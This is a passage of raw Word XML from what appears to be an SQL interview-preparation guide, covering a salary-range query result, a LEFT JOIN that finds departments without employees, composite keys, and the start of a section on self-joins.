    </w:p>
    <w:p w14:paraId="198BDEDD"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ELECT Statement</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves the id, name, salary, and the calculated percentage based on the salary range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F188FF" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2167C4"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This query will give you a result like thi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
        <w:gridCol w:w="577"/>
        <w:gridCol w:w="602"/>
        <w:gridCol w:w="1463"/>
      </w:tblGrid>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="42A9CDD0" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2296AED5" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09BDF90C" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580808C4" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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alary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47452503" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="366EFA82" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074989B8"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B351390"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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3C4C3D"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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A457A3A"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greater than 90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="3163B0A1" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A8D153B"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="717467A0"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E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B8543F"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70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F84B6C0"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greater than 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="1C7426FC" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="587BD1E6"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2130545A"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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5620B478"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60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FB84D24"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greater than 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="507CFC73" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F086146"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F887818"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61741D5D"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E97614F"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less than 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="64BF3824" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65ED9F11"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67FC4077"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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="534207A5"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="272C2CCB"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less than 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001907E9" w:rsidRPr="005C1C9E" w14:paraId="1E34E6AA" w14:textId="77777777" w:rsidTr="001907E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D9B976"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39ACAB6D"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F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303939FC"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E7233AB"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less than 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E81BC6E" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This SQL query successfully categorizes employees into their respective salary ranges as requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A9BDA" w14:textId="350A082B"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29AEE167">
          <v:rect id="_x0000_i3050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="019ED52E" w14:textId="77AA2796" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A57825">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="751" w:name="_Toc196308231"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="001907E9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="001907E9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ind the department name who does not have an employee? (Employee and Department table given)</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="751"/>
    </w:p>
    <w:p w14:paraId="4AA319B9" w14:textId="181AA5D6" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To find the department name that does not have an employee, you can use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to match employees with their departments and then filter the result to only include departments without any employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1EA4BF"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Here's the SQL query to achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A32BB9"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SELECT d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D12742"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FROM Departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBDAA7"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LEFT JOIN Employees e ON d.id = e.department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D60240A"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WHERE e.employee_id IS NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5378B6"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AB93C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This will return all records from the Departments table, and the matched records from the Employees table. If there is no match, the result is NULL for columns from the Employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0E17A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE e.employee_id IS NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This filters the results to only include departments that have no employees (i.e., where there is no matching employee_id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6E561"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A8ED6"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This query will return the department names that do not have any employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72DE4D" w14:textId="72E222E6" w:rsidR="00564F5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4C5D821C">
          <v:rect id="_x0000_i3051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6FBF4" w14:textId="5DC1926D" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00701CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="752" w:name="_Toc196308232"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the Composite key</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="752"/>
    </w:p>
    <w:p w14:paraId="6AA4A290" w14:textId="752578EA" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Composite Key</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a combination of two or more columns in a database table that are used together to uniquely identify a record. It is typically used when a single column is not sufficient to uniquely identify a row in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD67D9"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85BB23"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multiple Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A composite key is made up of multiple columns. Each individual column in the composite key may not be unique, but together they form a unique identifier for a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168F63E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Primary Key</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Composite keys are often used as a primary key in a table when a single field is not enough to uniquely identify a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBA221"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The combination of the values in the composite key columns must be unique across the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5347C4B2"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351D269"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Let's consider a table Student_Course that represents the relationship between students and courses. Since a student can take multiple courses, and a course can have multiple students, a composite key can be used to uniquely identify each record in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7501AF47"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CREATE TABLE Student_Course (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE2C48"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student_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5AFE2"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course_id INT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26992FE5"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enrollment_date DATE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF1FE8"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PRIMARY KEY (student_id, course_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07FE91"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDE11C"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6671C051"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In this example, the combination of student_id and course_id forms the composite key. No single column (student_id or course_id) is unique on its own, but together they uniquely identify each row in the table, ensuring that a student can't enroll in the same course more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBD8C4"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E79BE9"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Many-to-many relationships: Like the example above, composite keys are often used in junction tables to represent many-to-many relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E552924"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Historical data tracking: In cases where you track historical changes, you may use composite keys made up of fields like start_date and end_date to ensure uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74180857"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904EFA2"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A composite key is a powerful way to ensure uniqueness when a single column is not sufficient, and it helps in modeling complex relationships in databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A5B42" w14:textId="3F474674"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1639B7A7">
          <v:rect id="_x0000_i3052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A74B6B" w14:textId="4FFBEB1D" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00701CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="753" w:name="_Toc196308233"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="003A4D19" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Self-join</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="753"/>
    </w:p>
    <w:p w14:paraId="6517BC30" w14:textId="367143B7" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Self-join</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of join where a table is joined with itself. It is used when you need to combine rows within the same table based on a related column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B67AF"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E59425"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Same Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A self-join is performed on the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007114AE"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aliases</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since we are joining the table to itself, we typically use table aliases to distinguish between the two instances of the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D330465"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b/>
